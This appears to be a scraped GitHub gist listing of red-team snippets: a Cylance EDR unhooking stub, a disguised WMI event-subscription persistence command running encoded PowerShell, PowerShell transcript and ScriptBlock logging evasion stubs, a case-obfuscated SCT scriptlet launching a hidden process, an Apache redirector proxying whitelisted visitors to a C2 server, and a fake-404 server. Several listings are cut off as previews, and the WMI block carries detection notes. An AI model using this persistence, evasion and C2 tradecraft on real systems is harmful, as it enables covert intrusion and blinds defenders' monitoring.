View gist:1f31de5331842c25f4eed585d4bd2d65
function Unhook-Cylance() {
$winapi = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
View WMIEvent
# Registers a permanent WMI event subscription in root\subscription, in three parts:
#   1. __EventFilter 'IEUpdateNOW': a WQL query over Win32_LocalTime modification
#      events that matches when Hour = 9 and Minute = 30.
#   2. CommandLineEventConsumer 'IEUpdateNOW': runs the command line
#      "powershell -e blah" ("blah" stands in for an encoded command) with
#      RunInteractively set to 'false'.
#   3. __FilterToConsumerBinding: links the filter to the consumer.
# Detection notes: Sysmon event IDs 19, 20 and 21 record the filter, the consumer and
# the binding respectively, and event 5861 in Microsoft-Windows-WMI-Activity/Operational
# records the binding. Existing subscriptions can be reviewed with
# Get-WmiObject -Namespace root\subscription -Class __EventFilter (likewise
# __EventConsumer and __FilterToConsumerBinding) and removed with Remove-WmiObject.
# The object name resembles a browser updater, so review subscriptions by query and
# command line rather than by name.
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer}
# Reference: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
benpturner / whoami.txt
Last active Sep 16, 2018
Whoami /groups
# Print the current Windows identity object, then list its group memberships
# with each group SID translated to an NT account name.
$currentIdentity = [Security.Principal.WindowsIdentity]::GetCurrent()
$currentIdentity

# Calculated column: resolve a group SID string to its account name.
$groupNameColumn = @{
    Label      = "Group Name"
    Width      = 400
    Expression = {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($_.Value)
        $sid.Translate([System.Security.Principal.NTAccount]).Value
    }
}

$currentIdentity.Groups | Format-Table $groupNameColumn
benpturner / posh.cs
Last active Jan 4, 2019
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
benpturner / posh.cs
Created Jul 18, 2018
No Powershell with Transcript Logging Evasion
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll
benpturner / perms.ps1
Last active Oct 18, 2018
Powershell Perm Review
# Walk C:\ recursively and export each item's ACL (child name, provider path and
# the access entries rendered as text) to C:\temp\acl.csv.
# Best-effort: enumeration errors are silenced and any terminating error raised
# while reading an ACL is swallowed, so unreadable items are missing from the
# CSV without any record of the failure.
Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        try {
            Get-Acl -Path $_.FullName |
                Select-Object pschildname, pspath, accesstostring
        }
        catch {
        }
    } |
    Export-Csv C:\temp\acl.csv -NoTypeInformation
benpturner / sct
Last active Mar 28, 2019
Simple CSript - Implied JScript
<cOmPoNeNt><sCRipT>
// Proof-of-concept scriptlet: creates a Shell.Application object and calls
// ShellExecute to start calc.exe with the "open" verb; the final argument "0"
// is the window-show value (0 = hidden).
// The element names are mixed-case and the script element carries no language
// attribute (the gist title calls this "implied JScript"), so content rules
// that look for scriptlet tags should match case-insensitively and should not
// depend on a language attribute being present.
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0");
</sCRipT></cOmPoNeNt>
benpturner / Whitelist
Last active Aug 1, 2017
Apache Rewrite Whitelist
# Conditional reverse proxy: a request under /news/ is proxied to the backend
# only when BOTH conditions hold: the client IP is a key in the map file and
# the User-Agent matches the pattern below. Requests failing either condition
# are not rewritten, so a client on an unlisted address, or one sending a
# different User-Agent, sees only what this front server serves itself.
#
# The whitelist file needs to be formatted like so (key = client IP, value = "-"):
# 104.44.44.44 -
# 104.33.33.33 -
#
# NOTE(review): "%%{...}" looks like a "%{...}" variable reference escaped for a
# format-string template rather than literal Apache syntax -- confirm before
# reading this as a deployed configuration.

# Text-file lookup map named "ips", loaded from /opt/whitelist.txt.
RewriteMap ips txt:/opt/whitelist.txt
# Look up the client address; the lookup yields NOTFOUND when the key is absent,
# and the condition passes only when the result is something else.
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND
# Case-insensitive ([NC]) match on one specific browser User-Agent prefix.
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC]
# [P] forwards the request through the proxy module to the backend host, keeping
# the path below /news/; the client only ever talks to this front server.
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P]
View Simple HTTP Server
$serverport = '$port'
$httpresponse = '
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
benpturner / posh.cs
Last active Jul 18, 2018
Powershell.exe no more
using System;
using System.Text;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.EnterpriseServices;